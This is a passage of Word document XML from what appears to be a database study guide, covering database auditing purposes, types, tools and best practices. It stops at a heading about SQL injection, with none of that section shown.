        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Security Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B22D40C"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Detect unauthorized access, potential breaches, or suspicious activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522D8CC0"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Tracking login attempts, changes to user permissions, and access to sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387D8B06" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="445"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Compliance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434B46E3"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Ensure adherence to legal and regulatory requirements (e.g., GDPR, HIPAA).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EB46E9"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Documenting data access and modifications to meet audit and compliance standards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120C2753" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="445"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Data Integrity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774D43FC"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Monitor changes to data to ensure it remains accurate and consistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A361A86"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Auditing modifications to critical data fields and validating data changes against expected outcomes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A469D0" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="445"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Performance Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167C0FF4"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Identify performance issues and optimize database operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307CD0BE"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Analyzing query performance, identifying slow-running queries, and understanding workload patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F60DF57" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="445"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Forensic Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0264F00A"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Investigate incidents or anomalies to understand what happened and how.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75596487" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44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Reviewing logs to determine the source and impact of a data breach or unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01729865"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Types of Auditing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244CFCC9" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="446"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Access Auditing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388A774C" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="446"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Tracks</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: User logins, logout activities, failed login attempts, and user roles or permissions changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330F8081" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="446"/>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Ensure only authorized users have access to the database and monitor login activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C1A795" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="446"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Data Change Auditing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4446ED59" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="446"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Tracks</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: INSERT, UPDATE, DELETE operations on tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700C50A9" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="446"/>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Monitor changes to data, including who made the changes and when.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237F61BA" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="446"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Schema Changes Auditing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D4D9A2" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="446"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Tracks</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Modifications to database structure, such as changes to tables, indexes, or views.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AE1D7A" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="446"/>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Record changes to database schema to maintain version control and detect unauthorized changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AADB44D" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="446"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Query Auditing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EAC5CA" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="446"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Tracks</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Execution of SQL queries, including SELECT, INSERT, UPDATE, DELETE queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB2ABBA" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="446"/>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Analyze query performance and detect potential misuse or inefficient queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A72D423"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Implementation Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02412D31" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="447"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Database Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196F688D" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="447"/>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Record database activities to logs for analysis and review.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620AA218" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="447"/>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SQL Server Profiler, Oracle Audit Trails, MySQL General Query Log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF95E64" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="447"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Database Auditing Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A6FCD8" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="447"/>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Use specialized tools for comprehensive auditing and monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423EAE21" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="447"/>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Oracle Audit Vault, IBM Guardium, SQL Server Audit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AB02A6" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="447"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Built-In Database Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30919244" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="447"/>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Leverage features provided by the database management system for auditing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA50D33" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="447"/>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SQL Server Audit, PostgreSQL’s logging configuration, MySQL’s audit plugin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F836D7" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="447"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Custom Auditing Solutions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5CC3B9" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="447"/>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Develop custom solutions to meet specific auditing needs or requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CD8672" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="447"/>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Implementing triggers to log changes to tables, creating custom audit reports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AB8F2B"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Best Practices for Database Auditing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA03098" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="448"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Define Auditing Policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E753E76"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Establish clear policies on what to audit, including what activities and data to track.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EA2FD4"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Specify which tables, fields, or actions should be audited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D398E58" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="448"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Regularly Review and Analyze Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74166D87"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Continuously monitor and review audit logs to identify unusual patterns or potential issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B74D0A7"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Set up alerts for suspicious activities and perform periodic audits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B754CD7" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="448"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Ensure Minimal Performance Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E11BA76"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Implement auditing mechanisms that do not significantly affect database performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592AF923"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Optimize logging settings and use efficient audit trails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A49D5D" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="448"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Secure Audit Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2635D6F9"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Protect audit logs and data to prevent tampering or unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A84CE4B"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Encrypt audit logs and restrict access to audit data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EB0A28" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="448"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Compliance and Reporting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF1848F"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Generate reports to demonstrate compliance with regulatory requirements and organizational policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E774E99" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="448"/>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Produce audit reports for internal reviews or regulatory submissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E333D7" w14:textId="77777777" w:rsidR="00135B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="00135B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F807806" w14:textId="4DF6307A" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="138" w:name="_Toc178383321"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is SQL injection, and how can you prevent</w:t>
      </w:r>
      <w:bookmarkEnd w:id="138"/>
    </w:p>
